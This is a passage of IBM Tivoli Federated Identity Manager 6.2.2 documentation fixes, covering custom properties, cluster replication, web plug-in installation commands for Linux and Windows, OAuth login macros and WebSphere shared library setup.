    This parameter controls the number of times FIM retries a lookup if a key is not found. If a key is not found, FIM will waits for the time specified by the parameter DistributedMap.GetRetryDelay, described in the next section. The default setting for DistributedMap.GetRetryLimit is '10', meaning that ten retries are performed.

    To configure:

    1. Using ISC, Click Tivoli Federated Identity Manager -> Domain Management -> Runtime Node Management.
    2. Enter the string "DistributedMap.GetRetryLimit" in the Name field.
    3. Enter a number in the Value field.
    4. Click OK to apply the changes that you have made and exit from the panel.
    5. Load the configuration changes.
    DistributedMap.GetRetryDelay

    This parameter controls how long FIM waits between lookups. The default value is '2000', meaning that FIM will wait for 2 seconds before performing the retry.

    To configure:

    1. Using ISC, Click Tivoli Federated Identity Manager -> Domain Management -> Runtime Node Management.
    2. Enter the string "DistributedMap.GetRetryDelay" in the Name field.
    3. Enter a number in the Value field.
    4. Click OK to apply the changes that you have made and exit from the panel.
    5. Load the configuration changes.

    TOTP validation procedure

    When one-time use enforcement is enabled, OTP that has been used is stored in the distributed cache. When validating an incoming OTP, FIM performs the lookup of the cache to determine if the OTP has already been used. If the lookup fails, validation will proceeds. If the lookup succeeds, it means that the OTP has been used before and validation fails.

    RISK OF INSUFFICIENT RETRY
    If FIM does not find the entry, it might allow the OTP to be re-used on another TFIM instance in the cluster.

    RISK OF EXCESSIVE RETRY
    Validation of the OTP will take longer than necessary. The time needed for a successful OTP validation will take at least GetRetryDelay (ms) x GetRetryLimit.

    Back to Contents



    IRRELEVANT PARAMETERS IN SAML PARTNER RESPONSE FILE DOCUMENTATION (IV41598)

    The following parameters are documented in the Command reference > manageItfimPartner > SAML partner response file reference section of the Tivoli Federated Identity Manager Administration Guide v6.2.2 and earlier:

    These parameters are not relevant to the SAML partner response file and must be removed from this section.

    The following parameters are relevant to the SAML federation response file and are documented in the Command reference > manageItfimFederation > SAML federation response file reference section:

    Back to Contents



    CANNOT CONFIGURE TIVOLI FEDERATED IDENTITY MANAGER TO USE POST ONLY IN OPENID FLOWS (IV37707)

    You can use the following custom property to configure Tivoli Federated Identity Manager to use POST for messages:

    OpenID.AlwaysPost
    Enforces the communication between an Identity Provider and a Service Provider to use POST as the request method regardless of payload size.

    Type: Boolean
    Example value: False (default)

    Back to Contents



    TIVOLI ACCESS MANAGER JAVA RUNTIME 6.1.1 FP1 OR ABOVE REQUIRED FOR TAM ADAPTER (IV44466)

    In the IBM Tivoli Federated Manager 6.2.2 Configuration Guide, under the topic Deploying User Self Care > Configuring a user registry > Configuring a Tivoli Access Manager adepter for WebSphere Federated Repository > Configuring a Tivoli Access Manager adapter > Procedure, it states:

    3. Ensure that you have installed the Tivoli Access Manager 6.1.1 Java runtime component.

    Tivoli Access Manager 6.1.1 Fixpack 1 or above contains fixes for the Java runtime component that are required if you want to use the Tivoli Access Manager adapter for WebSphere Federated Repository.

    It should state:

    3. Ensure that you have installed the Tivoli Access Manager Java runtime version 6.1.1 or above. If you have installed version 6.1.1, ensure that you have applied Fixpack 1 or above.


    Back to Contents



    INCORRECT STEPS FOR ENABLING WEBSPHERE CLUSTER REPLICATION (IV36167)

    Some of the steps outlined in the TFIM 6.2.2 Configuration guide for enabling WAS cluster replication are incorrect.

    Under section Federated Identity Manager > Configuring > Domain configuration, in the topic "Enabling replication in a WebSphere cluster", steps are 3 and 9a are wrong.

    The current steps are:

    1. In the General Properties section of the screen, go to the Consistency settings section. Select Enable cache replication. Verify that the Consistency Settings area has the following values:
    1. Specify your replication settings in the General Properties panel:
      1. Set the Replication domain to the name of the cluster into which you have deployed the Tivoli Federated Identity Manager runtime application.
      2. Set Replication mode to Both client and server.

    The TFIM cluster does not appear in the "replication domain" options.

    The steps should be:

    1. In the General Properties section of the screen, go to the Consistency settings section. Select Enable cache replication. Verify that the Consistency Settings area has the following values:
    1. Specify your replication settings in the General Properties panel:
      1. Set the Replication domain to the name of the replication domain created when Tivoli Federated Identity Manager runtime application is deployed, for example FIM-your_cluster_name or FIM-your_server_name.
      2. Set Replication mode to Both client and server.

    Back to Contents



    CUSTOM PROPERTIES FOR WS-FEDERATION(IV31660)

    WSFed.IDP.RSTR.Excluded.Elements
    Specifies the comman-separated list of elements to be excluded from the RequestSecurityTokenResponse before it is sent to the service provider. The list of elements that can be excluded are "Renewing", "Forwardable", "Status" and "Delegatable".
    The list of excluded elements can be controlled in three levels:
    Global level
    Controls the list of excluded elements for all federations and partners.

    Configuration example: WSFed.IDP.RSTR.Excluded.Elements = Forwardable,Delegatable,Status,Renewing

    Federation level
    Controls the list of excluded elements for a specific federation and all its partners.

    Configuration example: WSFed.IDP.RSTR.Excluded.Elements%<FEDERATIONID> = Forwardable,Delegatable,Status,Renewing

    Example for a federation with the ID https://idp/sps/fed/wsf:

    SAML20.IDP.UnsolicitedSSO.WSFed.IDP.RSTR.Excluded.Elements%https://idp/sps/fed/wsf = Forwardable,Delegatable,Status,Renewing

    Partner level
    Controls the list of excluded elements for a specific federation and a specific partner.

    Configuration example: WSFed.IDP.RSTR.Excluded.Elements%<FEDERATIONID>%<PARTNERID>= Forwardable,Delegatable,Status,Renewing

    Example for a federation with the ID https://idp/sps/fed/wsf and its partner with the ID https://sp/sps/fed/wsf

    WSFed.IDP.RSTR.Excluded.Elementsg%https://idp/sps/fed/wsf%https://sp/sps/fed/wsf = Forwardable,Delegatable,Status,Renewing

    • Value type: String
    • Example value: Forwardable,Delegatable,Status,Renewing

    <FEDERATIONID> represents the Provider ID of the federation and <PARTNERID> represents the Provider ID of the partner. You can obtain the Provider ID of the federation from the Federation Properties page in the console while the Provider ID of the partner can be obtained from the Partner Properties page in the console.

    You can use the three levels of control concurrently. Tivoli Federated Identity Manager implements concurrent use by checking the settings to decide what action to take in the following order:
    1. Partner level setting
    2. Federation level setting
    3. Global level setting

    Back to Contents



    LDAP MIGRATION TOOL DOES NOT WORK FOR NON-DEFAULT USER IDENTIFIER ATTRIBUTE (IV31661)

    In the IBM Tivoli Federated Manager 6.2.2 Installation Guide, under the topic Appendix A. Upgrading to version 6.2.2->Upgrading LDAP, it states:

    Other parameters are available to pass to this tool:

    For the -reverse parameter, it should state:

    Two new parameters are now available to pass to this tool:

    Back to Contents



    WRONG REQUIREMENT FOR CONSTRAINED DELEGATION ACCOUNT (IV24708)

    In the IBM Tivoli Federated Manager 6.2.2 Configuration Guide, under the topic Configuring Active Directory and WebSphere for constrained delegation, it states:

    6. On the domain controller, add the tfimdeleguser user to the Domain administrative group.
    To verify:
    a. Select Active Directory Users and Computer
    b. For the domain, click Users and click Domain Admins
    c. Select the Members tab. Verify that the tfimdeleguser is listed as a group member.

    It should state:

    6. On the machine hosting the WebSphere node agent running the Tivoli Federated Identity Manager runtime, add the tfimdeleguser user to the Local administrative group.
    To verify:
    a. Select Start > Programs > Administrative Tools > Computer Management.
    b. Open Local Users and groups.
    c. Open groups.
    d. Right-click on the local group Administrators.
    e. Select Properties.
    f. Verify that the tfimdeleguser is listed as a group member.

    Note: For a cluster environment, this step must be repeated on all machines hosting a node member of WebSphere cluster running the Tivoli Federated Identity Manager runtime.

    Back to Contents



    IBM TIVOLI FEDERATED IDENTITY MANAGER WEB PLUG-IN UPDATES (IV17421)

    Tivoli® Federated Identity Manager provides Web plug-ins for various HTTP web servers. The primary function of the plug-in is to extract the user identity information from the LTPA cookie in a web request. The plug-in also makes the identity information available to the target application hosted by the web server. The plug-in uses either HTTP headers or server variables, if supported by the web server.

    This section covers the following topics:

    About Tivoli Federated Identity Manager Web plug-in updates

    The IBM® Tivoli Federated Identity Manager 6.2.2 fix pack ships with updated Tivoli Federated Identity Manager plug-ins which were tested with current versions of the HTTP servers and operating systems.

    Contents

    This technote details the following information about the updated Tivoli Federated Identity Manager plug-ins:
    • Support for new platforms
    • Support for new HTTP server versions
    • Workaround for installing IBM Tivoli Federated Identity Manager 6.2.2 fix pack in Windows Server 2008
    • Instructions for installing the IBM Tivoli Federated Identity Manager, 6.2.2, WebPI fix pack
    • Instructions for configuring the IBM Tivoli Federated Identity Manager Web plug-in Custom LTPA Cookie Name
    • Instructions for uninstalling the IBM Tivoli Federated Identity Manager, 6.2.2, WebPI fix pack

    Prerequisites and requirements

    Install the following prerequisites before you use the updated IBM Tivoli Federated Identity Manager plug-ins:
    • For Windows: Microsoft Visual C++ version 10.0 Redistributable package
    The updated IBM Tivoli Federated Identity Manager plug-ins were tested with the following operating systems and software combinations:
    • IIS 6.0 on Windows Server 2003 (32 bit)
    • IIS 7.0 on Windows Server 2008 (32 bit and 64 bit)
    • IIS 7.5 on Windows Server 2008 R2 (32 bit* and 64 bit)
    • Apache 2.0 on Linux (32 bit)
    • Apache 2.2 on Linux (32 bit and 64 bit)
    • IBM HTTP Server 6.1 on Linux (32 bit)
    • IBM HTTP Server 7.0 on Linux (32 bit)
    • IBM HTTP Server 8.0 on Linux (32 bit and 64 bit)
    NOTE: * Denotes compatibility mode.

    Known issue with workaround

    Issue Description Workaround
    The IBM Tivoli Federated Identity Manager 6.2.2 GA installer cannot install the IIS plug-in on Windows Server 2008 In the IBM Tivoli Federated Identity Manager 6.2.2 GA version, the IIS plug-in can be installed only on Windows Server 2003, and cannot be installed on Windows Server 2008

    This is an issue when trying to install the Web plug-ins for Windows Server 2008 because the GA installer cannot install the Web plug-ins. An IBM Tivoli Federated Identity Manager component must be installed before installing any fix pack package.

    Install a lightweight IBM Tivoli Federated Identity Manager component such as Web Services Security Management. Then, use the Update Installer to install the web plug-in fix pack package.

    Known limitation

    LTPA Cookie name

    Tivoli Federated Identity Manager 6.2.2 fix pack 2 introduced the ability to modify the name of the LTPA cookie that the Web plug-ins can process.

    The LTPA Cookie Name cannot be modified from the Tivoli Federated Identity Manager console.

    It can be modified only in the itfimwebpi.xml file.

    Installing the IBM Tivoli Federated Identity Manager, 6.2.2, WebPI fix pack on specific platforms

    For x86 Linux
    NOTE: All the instances of $FIMInstallLocation in this section refers to the standard location of the Tivoli Federated Identity Manager 6.2.2 files in your directory.
    1. Back up the existing $FIMInstallLocation/webpi directory.
    2. Remove any files in the $FIMInstallLocation/webpi directory.
    3. Install the WebSphere® Application Server Update Installer utility for x86 Linux.
    4. Run the Update Installer.
    5. Select 6.2.2-TIV-TFIM-FP0018-WebPlugin.pak.
    6. Install GSKit. In the command line, type: 
      rpm -ivh /opt/IBM/FIM/webpi/x86_linux_2/gskit-installer/gsk7bas-7.0-4.38.i386.rpm
    7. Migrate the itfimwebpi.xml configuration from the $FIMInstallLocation/webpi directory that you backed up, to the $FIMInstallLocation/webpi/x86_linux_2/etc/ directory.
    8. Copy the ltpa.keys file to the $FIMInstallLocation/webpi/x86_linux_2/etc directory.
    9. Reconfigure the HTTP Server to use the new plug-in binary. Add or modify the following line for the appropriate HTTP servers:
      apache20: LoadModule fimwebpi_module /opt/IBM/FIM/webpi/x86_linux_2/lib/libitfimwebpi-apache20.so
apache22: LoadModule fimwebpi_module /opt/IBM/FIM/webpi/x86_linux_2/lib/libitfimwebpi-apache22.so
IHS 6.0: LoadModule fimwebpi_module /opt/IBM/FIM/webpi/x86_linux_2/lib/libitfimwebpi-apache20.so
IHS 7.0: LoadModule fimwebpi_module /opt/IBM/FIM/webpi/x86_linux_2/lib/libitfimwebpi-apache22.so
IHS 8.0: LoadModule fimwebpi_module /opt/IBM/FIM/webpi/x86_linux_2/lib/libitfimwebpi-apache22.so
    10. Add the following environment variables permanently to the shell environment of the current user.
      export LD_LIBRARY_PATH=/opt/IBM/FIM/webpi/x86_linux_2/lib
export ITFIMWEBPI=/opt/IBM/FIM/webpi/x86_linux_2
    11. Restart the web server.

    For x86 Windows
    NOTE: All the instances of $FIMInstallLocation in this section refers to the standard location of the Tivoli Federated Identity Manager 6.2.2 files in your directory.
    1. Back up the existing $FIMInstallLocation\webpi directory.
    2. Remove any files in the $FIMInstallLocation\webpi directory.
    3. Install the WebSphere Application Server Update Installer utility for x86 Windows.
      NOTE: For Windows Server 2008, install a Tivoli Federated Identity Manager component in the $FIMInstallLocation directory so that the Update Installer can allow the fix pack installation.
    4. Run the Update Installer utility.
    5. Select 6.2.2-TIV-TFIM-FP0018-WebPlugin.pak.
    6. Install GSKit. In the command line, type:
      C:\Program Files\IBM\FIM\webpi\x86_nt_4\gskit-installer>setup.exe setup.iss
    7. Migrate the itfimwebpi.xml configuration from the $FIMInstallLocation directory that you backed up to the $FIMInstallLocation\webpi\x86_nt_4\etc directory.
    8. Copy the ltpa.keys file to the $FIMInstallLocation\webpi\x86_nt_4\etc directory.
    9. Configure IIS to use the Tivoli Federated Identity Manager Web plug-ins ISAPI filter.
      • For IIS 6, run the following commands. The first command lists the web server IDs to be used in the configuration script:
        C:\Program Files\IBM\FIM\webpi\x86_nt_4\bin>cscript.exe /nologo fimpiiiscfg.vbs -action list-webservers
C:\Program Files\IBM\FIM\webpi\x86_nt_4\bin>cscript.exe /nologo fimpiiiscfg.vbs -action config -path "c:\Program Files\IBM\FIM\webpi\x86_nt_4" -webserver <web-server-id>
      • For IIS7.x, run the following commands:
        C:\Windows\System32\inetsrv>appcmd.exe set config "<i>Default Web Site</i>" -section:system.webServer/isapiFilters/+"[name='ITFIMWEBPI',path='C:\Program Files\IBM\FIM\webpi\x86_nt_4\bin\itfimwebpi-iis.dll',enabled='True',enableCache='True']" /commit:apphost
    10. Install any additional prerequisites.
      In this case, install the following Microsoft Visual C++ Redistributable packages:
    11. Set the environment variable for the Operating System. Select My Computer > Properties > Environment Variables. 
      ITFIMWEBPI=c:\Program Files\IBM\FIM\webpi\x86_nt_4
    12. Add C:\Program Files\IBM\gsk7\lib to the path.
    13. Restart the system and the web server.

    For x64 Linux
    NOTE: All the instances of $FIMInstallLocation in this section refers to the standard location of the Tivoli Federated Identity Manager 6.2.2 files in your directory.
    1. Back up the existing $FIMInstallLocation/webpi directory.
    2. Remove any files in the $FIMInstallLocation/webpi directory.
    3. Install WebSphere Application Server Update Installer utility for x64 Linux.
    4. Run the Update Installer.
    5. Select 6.2.2-TIV-TFIM-FP0018-WebPlugin.pak.
    6. Install GSKit. On the command line, type: 
      rpm -ivh /opt/IBM/FIM/webpi/amd64_linux_2/gskit-installer/gsk7bas64-7.0-4.38.x86_64.rpm
    7. Migrate the itfimwebpi.xml configuration from the $FIMInstallLocation/webpi directory to the $FIMInstallLocation/webpi/x64_linux_2/etc/ directory that you backed up.
    8. Copy the ltpa.keys file to the $FIMInstallLocation/webpi/x64_linux_2/etc directory.
    9. Reconfigure the HTTP Server to use the new plug-in binary. Add or modify the following line for the appropriate HTTP servers:
      apache22: LoadModule fimwebpi_module /opt/IBM/FIM/webpi/amd64_linux_2/lib/libitfimwebpi-apache22.so
IHS 7.0: LoadModule fimwebpi_module /opt/IBM/FIM/webpi/amd64_linux_2/lib/libitfimwebpi-apache22.so
IHS 8.0: LoadModule fimwebpi_module /opt/IBM/FIM/webpi/amd64_linux_2/lib/libitfimwebpi-apache22.so
    10. Add the following environment variables permanently to the shell environment of the current user:
      export LD_LIBRARY_PATH=/opt/IBM/FIM/webpi/amd64_linux_2/lib
export ITFIMWEBPI=/opt/IBM/FIM/webpi/amd64_linux_2
    11. Restart the web server.

    For x64 Windows
    NOTE: All the instances of $FIMInstallLocation in this section refers to the standard location of the Tivoli Federated Identity Manager 6.2.2 files in your directory.
    1. Back up the existing $FIMInstallLocation\webpi directory.
    2. Remove any files in the $FIMInstallLocation\webpi directory.
    3. Install WebSphere Application Server Update Installer utility for x64 Windows.
      NOTE: For Windows Server 2008, install a Tivoli Federated Identity Manager component in the $FIMInstallLocation directory so that the Update Installer can allow the fix pack installation.
    4. Run the Update Installer.
    5. Select 6.2.2-TIV-TFIM-FP0018-WebPlugin.pak.
    6. Install GSKit. Execute the following command: 
      C:\Program Files (x86)\IBM\FIM\webpi\x86_64_nt_4\gskit-installer>GSK7BAS_64.msi
    7. Migrate the itfimwebpi.xml configuration from the $FIMInstallLocation directory that you backed up to the $FIMInstallLocation\webpi\x86_64_nt_4\etc directory.
    8. Copy the ltpa.keys file in $FIMInstallLocation\webpi\x86_64_nt_4\etc directory.
    9. Configure IIS to use the Tivoli Federated Identity Manager Web plug-ins ISAPI filter. Run the following commands:
      C:\Windows\System32\inetsrv>appcmd.exe set config -section:system.webServer/isapiFilters /+"[name='ITFIMWEBPI',path='C:\Program Files (x86)\IBM\FIM\webpi\x86_64_nt_4\bin\itfimwebpi-iis.dll',enabled='True',enableCache='True']" /commit:apphost
    10. Install any additional prerequisites.
      In this case, install the following Microsoft Visual C++ Redistributable packages:
    11. Set the environment variable for the Operating System. Select My Computer > Properties > Environment Variables. 
      ITFIMWEBPI=C:\Program Files (x86)\IBM\FIM\webpi\x86_64_nt_4
    12. Add C:\Program Files\IBM\GSK7_64\lib64 to the path.
    13. Restart the system and the web server.

    Other Setup and Configuration

    Tivoli Federated Identity Manager Web plug-ins Custom LTPA Cookie Name

    Configure the name of the cookie containing the LTPA token in FIM WebPI. The WebPI uses the default value LtpaToken2 when a custom name is not provided.
    1. Update the itfimwebpi.xml.template file with a new attribute in the LTPAConfiguration element called ltpaCookieName. For example:
      <pi:LTPAConfiguration id="uuid-6cd36543-3404-42fg-8314-0800200c9a66" ltpaPassword="@@LTPA_PASSWORD@@" ltpaCookieName="LtpaToken2"/>
    2. Modify the custom LTPA cookie name in a text editor.

    Uninstalling the IBM Tivoli Federated Identity Manager, 6.2.2, WebPI fix pack on specific platforms

    NOTE: All the instances of $FIMInstallLocation in this section refers to the standard location of the Tivoli Federated Identity Manager 6.2.2 files in your directory.
    For x86 Linux
    1. Stop the web server.
    2. Use the IBM WebSphere Update Installer to uninstall the Web plug-ins.

      The Web plug-in files are removed from the $FIMInstallLocation directory.

    3. Modify the web server configuration files. Find and remove any of the following instances:
      • For Apache22 based server: LoadModule fimwebpi_module $FIMInstallLocation/$CONTEXT/lib/libitfimwebpi-apache22.so
      • For Apache20 based server: LoadModule fimwebpi_module $FIMInstallLocation/$CONTEXT/lib/libitfimwebpi-apache20.so
    4. Unset or modify the LD_LIBRARY_PATH so that it does not contain a path where the Tivoli Federated Identity Manager 6.2.2 fix pack Web plug-in were installed.
    5. Unset the ITFIMWEBPI environment variable.

    For x86 Windows

    Before running the update installer to uninstall the Web plug-in fix pack, do the following steps to remove the Web plug-in fix pack configurations.
    1. Run the unconfigure script or command:
      • For IIS 6.0
        cd "C:\Program Files\IBM\FIM\webpi\x86_nt_4\bin"
cscript.exe /nologo "C:\Program files\IBM\FIM\webpi\x86_nt_4\bin\fimpiiiscfg.vbs" -action unconfig
      • For IIS 7.x
        C:\Windows\System32\inetsrv>appcmd.exe set config "Default Web Site" -section:system.webServer/isapiFilters/-"[name='ITFIMWEBPI',path='C:\Program Files\IBM\FIM\webpi\x86_nt_4\bin\itfimwebpi-iis.dll',enabled='True',enableCache='True']" /commit:apphost
    2. Uninstall the Microsoft Visual C++ redistributable.
    3. Delete the ITFIMWEBPI environment variable.
    4. Delete the GSKit library path from the path env variable.
    For x64 Linux
    NOTE:All the instances of $FIMInstallLocation in this section refers to the standard location of the Tivoli Federated Identity Manager 6.2.2 files in your directory.
    1. Stop the web server.
    2. Use the IBM WebSphere Update Installer to uninstall the Web plug-ins.

      The Web plug-in files are removed from the $FIMInstallLocation directory.

    3. Modify the web server configuration files. Find and remove any of the following instances:
      • For Apache22 based server: LoadModule fimwebpi_module $FIMInstallLocation/$CONTEXT/lib/libitfimwebpi-apache22.so
      • For Apache20 based server: LoadModule fimwebpi_module $FIMInstallLocation/$CONTEXT/lib/libitfimwebpi-apache20.so
    4. Unset or modify the LD_LIBRARY_PATH so that it does not contain a path where the Tivoli Federated Identity Manager 6.2.2 fix pack Web plug-in were installed.
    5. Unset the ITFIMWEBPI environment variable.
    For x64 Windows
    1. Run the unconfigure command:
      C:\Windows\System32\inetsrv>appcmd.exe set config "Default Web Site" -section:system.webServer/isapiFilters/-"[name='ITFIMWEBPI',path='C:\Program Files (x86)\IBM\FIM\webpi\x86_64_nt_4\bin\itfimwebpi-iis.dll',enabled='True',enableCache='True']" /commit:apphost
    2. Uninstall the Microsoft Visual C++ redistributable.
    3. Delete the ITFIMWEBPI environment variable.
    4. Delete the GSKit library path from the path env variable.

    Back to Contents



    FIXES FOR OAUTH (IV17609)

    OAuth authentication macros are now available in IBM Tivoli Federated Identity Manager, version 6.2.2, fix pack .

    IBM® Tivoli® Federated Identity Manager supplies contextual authentication parameters in customizing login forms.

    When using WebSEAL as the point of contact server, these are query-string parameters to the login page.

    For WebSphere Application Server, they are in the WASReqURL cookie when the login page is loaded. The parameters are macros in the configuration of the authentication callback for the point of contact server profile.

    NOTE: When you use the WebSphere point of contact, the value of the query string parameter needs to be URL decoded twice.

    The OAuth 1.0 and 2.0 authorization endpoints in IBM® Tivoli® Federated Identity Manager, version 6.2.2, fix pack , now support OAuth parameters in the HTTP POST body.

    NOTE: The Tivoli Access Manager configuration utility was modified to attach an unauthenticated ACL to the authorization endpoints instead of an authenticated ACL.

    If you have existing OAuth federations that use Tivoli Access Manager WebSEAL as their point of contact that were created with an earlier version (before IBM Tivoli® Federated Identity Manager 6.2.2 fix pack 2), rerun the Tivoli Access Manager configuration utility after updating to IBM Tivoli® Federated Identity Manager 6.2.2 fix pack .

    OAuth protocol supported macros for customizing an authentication login form

    The following table indicating how an OAuth federation populates the authentication macros is added in the Supported macros for customizing an authentication login form section of the Configuration Guide.

    Macro Query-String Parameter name Description and value
    %FEDID% FedId A unique identifier (UUID) used internally by Tivoli Federated Identity Manager to identify the federation.
    %FEDNAME% FedName The user-assigned name of the federation.
    %PARTNERID% PartnerId The OAuth unique client identifier.
    %TARGET% Target OAuth client redirection URI.
    %SSOREQUEST% SSORequest A base-64 encoded string representing the query and body parameters from the OAuth request.

    Back to Contents



    FIM FSSO AND WSSM CANNOT BE INSTALLED ON THE SAME WAS (IV19846)

    Use the following documentation updates for the corresponding IBM® Tivoli® Federated Identity Manager versions:

    Updates in the IBM Tivoli Federated Identity Manager version 6.2.0 documentation

    In the IBM Tivoli Federated Identity Manager Web Service Security Management Configuration Guide, under the Configuring WebSphere Application Server, add a subsection that describes methods to associate the shared library with web service applications after the Configuring for a Cluster Environment section. See the following instructions:

    Associating a shared library

    Associate the shared library with web service provider and requester applications before the shared library can be used by these applications. Use any of the following methods:
    • Associating a shared library with an application.
    • Associating a shared library with a server.

    Associating a shared library with an application

    Associate the shared library with a specified application. All the applications that use the shared library must follow this procedure:
    This method associates the shared library with a specified application. All the applications that use the shared library must follow this procedure:
    NOTE: You must use the administrative console associated with the application server where the Web services security management component is installed.
    1. Select Applications > Enterprise Applications > application_name > Shared library references in the console navigation to access the Shared library references page.
    2. In the Shared library references page, select an application or module that you want to associate with the shared library.
    3. Select Reference shared libraries.
    4. In the Shared Library Mapping page, select the ITFIM_WSSM shared library from the Available list.
    5. Click >> to add the ITFIM_WSSM shared library to the selected list.
    6. Click OK.
    7. In the Shared library references page, click OK.
    8. Save the configuration changes.

    Associating a shared library with a server

    NOTE: In the IBM Tivoli Federated Identity Manager Web Service Security Management Configuration Guide, under the section Configuring WebSphere Application Server, move the Configuring the Class Loader subsection under the Associating Shared Library subsection as the second subsection.

    See the following content changes:

    Associate the shared library with a specified server. The shared library is associated with all the applications in the server.

    NOTE: Do not use this method if Federated Single Sign On is configured in the same WebSphere Application Server.
    1. Start the WebSphere Application Server administrative console.
    2. Log in, if necessary.
      NOTE: You must use the administrative console associated with the application server where the Web Services Security Management component is installed.
    3. Select Servers > Application Servers.
    4. Select the server associated with your application. For example, server1.
    5. In the Server Infrastructure pane, expand Java and Process Management option.
    6. Click Class loader.
    7. Click New.
    8. Do not change any options.
    9. Click Apply.
    10. In the Additional Properties pane, select Shared Library references.
    11. Click Add to specify a shared library.
    12. In the Library name field, select the ITFIM_WSSM shared library previously defined.
    13. Click OK.
    14. In the Messages pane at the top of the Application Servers window, click Save to commit your changes.

    Updates in the IBM Tivoli Federated Identity Manager version 6.2.1 and 6.2.2 documentation

    In the IBM Tivoli Federated Identity Manager Web Service Security Management Configuration Guide, under the section Configuring WebSphere Application Server, the fifth step to configure WebSphere Application Server is changed into: You must associate the shared library with web service provider and requester applications before the shared library can be used by these applications.

    About this task

    In the IBM Tivoli Federated Identity Manager Web Service Security Management Configuration Guide, under the section Configuring WebSphere Application Server, add a subsection that describes methods to associate the shared library with web service applications is added right after the section Configuring for a Cluster Environment. See the following instructions:

    Associating a shared library

    You must associate the shared library with web service provider and requester applications before the shared library can be used by these applications. Use any of the following methods:
    • Associating a shared library with an application.
    • Associating a shared library with a server.
    NOTE: Add a subsection that describes the method to associate the shared library with a web service application. See the following section for details:

    Associating a shared library with an application

    This method associates the shared library with a specified application. All the applications that use the shared library must follow this procedure:
    1. Start the WebSphere Application Server administrative console.
    2. Log in, if necessary.
      NOTE: You must use the administrative console associated with the application server where the Web Services Security Management component is installed.
    3. Select Applications > Enterprise Applications > application_name > Shared library references from the console navigation tree to access the Shared library references page.
    4. In the Shared library references page, select an application or module that you want to associate with the shared library.
    5. Select Reference shared libraries.
    6. In the Shared Library Mapping page, select the ITFIM_WSSM shared library from the Available list.
    7. Click >> to add them to the selected list.
    8. Click OK.
    9. In the Shared library references page, click OK.
    10. Save the configuration changes.

    Associating a shared library with a server

    NOTE: In the IBM Tivoli Federated Identity Manager Web Service Security Management Configuration Guide, under the section Configuring WebSphere Application Server, move the Configuring the Class Loader subsection under the Associating shared library with an application section as the second subsection. See the following instructions for details:

    Associate the shared library with a specified server. The shared library is associated with all the applications in the server.

    NOTE: Do not use this method if Federated Single Sign On is configured in the same WebSphere Application Server.
    1. Start the WebSphere Application Server administrative console.
    2. Log in, if necessary.
      NOTE: You must use the administrative console associated with the application server where the Web Services Security Management component is installed.
    3. Select Servers > Application Servers.
    4. Select the server associated with your application. For example, server1.
    5. In the Server Infrastructure pane, expand the Java and Process Management option.
    6. Click Class loader.
    7. Click New.
    8. Do not change any of the options.
    9. Click Apply.
    10. In the Additional Properties pane, select Shared Library references.
    11. Click Add to specify a shared library.
    12. In the Library name field, select the ITFIM_WSSM shared library previously defined.
    13. Click OK.
    14. In the Messages pane at the top of the Application Servers window, click Save to commit your changes.

    Back to Contents



    INCORRECT ONLINE DOCUMENT FOR THE INSTALLATION NEEDS TO BE CHANGED (IV19850)

    There was an error in the command value used for installing the Tivoli Federated Identity Manager, version 6.2.2 Web Services Security Management feature.

    Replace the installation command note in the following sections of the Tivoli Federated Identity Manager, version 6.2.2 Installation Guide:

  • Installing federated single sign-on or token exchange > Installing the federated single sign-on feature > Installing federated single sign-on on an existing WebSphere Application Server
  • Installing Web services security management > Installing the Web services security management feature
  • Installing federated provisioning > Installing WS-Provisioning runtime
  • Installing the management console > Installing the management console
  • Installing the IBM Support Assistant

    • with the following:

    NOTE: The installation is designed so that the WebSphere® Application Server deployment can listen on localhost. If it does not listen on localhost, use the parameter websphereProperties.adminClientConnectorHost on the installation command to specify the host name. For example, on Linux:

    ./install_linux_x86.bin -W websphereProperties.adminClientConnectorHost=<hostname>

    Back to Contents



    ENABLING THE AUTHENTICATING AUTHORITY ATTRIBUTE (IV17409)

    The AuthenticatingAuthority attribute is a unique identifier that determines the authenticating authority involved in the authentication of the principal.

    An example of an authenticating authority is WebSEAL. For scenarios where you might have multiple authenticating authorities, this feature helps in identifying the specific authentication authority that authenticated the principal. Service providers can then use this information to carry out different actions.

    To enable this capability, you must add the following STSUUSER attribute:

    • Name: AuthenticatingAuthority
    • Type:urn:oasis:names:tc:SAML:2.0:assertion
    You must add this attribute in the mapping module of the Identity Provider. You can use one of the supported mapping rules such as XSL, Tivoli Directory Integrator (TDI), JavaScript, and custom map module.

    Insert the AuthenticatingAuthority attribute in the mapping rule as shown in the examples.

    JavaScript example:
    importPackage(Packages.com.tivoli.am.fim.trustserver.sts);
importPackage(Packages.com.tivoli.am.fim.trustserver.sts.uuser);

...

// Example of adding the AuthenticatingAuthority for SAML 2.0
var authenticatingAuthorityAttr = new Attribute("AuthenticatingAuthority",
"urn:oasis:names:tc:SAML:2.0:assertion", "https//idp.example.com");
stsuu.addAttribute(authenticatingAuthorityAttr);
    XSL example:
    <xsl:stylesheet extension-element-prefixes="mapping-ext" version="1.0">
<xsl:strip-space elements="*"/>
<xsl:output method="xml" version="1.0" encoding="utf-8" indent="yes"/>
...
-
<xsl:template match="//stsuuser:AttributeList">
-
<stsuuser:AttributeList>
-
<!--
 Example of adding the authenticating authority attribute 
-->
-
<stsuuser:Attribute name="AuthenticatingAuthority" 
type="urn:oasis:names:tc:SAML:2.0:assertion">

<stsuuser:Value>https//idp.example.com</stsuuser:Value>
</stsuuser:Attribute>
</stsuuser:AttributeList>
</xsl:template>

...
</xsl:stylesheet>

    When the AuthenticatingAuthority subelement is available in the AuthnContext element of the SAML 2.0 assertion, the following STSUUSER attribute is available at the Service Provider:

    <stsuuser:Attribute name="AuthenticatingAuthority" 
type="urn:oasis:names:tc:SAML:2.0:assertion">
<stsuuser:Value>https://idp.example.com</stsuuser:Value>;
</stsuuser:Attribute>"
    After obtaining information from this attribute, service providers can then perform any required actions.

    Back to Contents



    CUSTOM PROPERTIES FOR SAML 2.0 RELAY STATE (IV17413)

    SAML20.IDP.UnsolicitedSSO.RelayState.URLEncoding
    When specified as true, the RelayState in an unsolicited authentication response is URL encoded by the identity provider before it is sent to the service provider. This configuration applies to a response that is sent using HTTP POST binding and HTTP ARTIFACT binding with the HTTP POST artifact delivery method.
    The URL encoding can be controlled in three levels:
    Global level
    Controls the URL encoding for all federations and partners.

    Configuration example: SAML20.IDP.UnsolicitedSSO.RelayState.URLEncoding = true

    Federation level
    Controls the URL encoding for a specific federation and all its partners.

    Configuration example: SAML20.IDP.UnsolicitedSSO.RelayState.URLEncoding_<FEDERATIONID> = true

    Example for a federation with the ID https://idp/sps/fed/saml20:

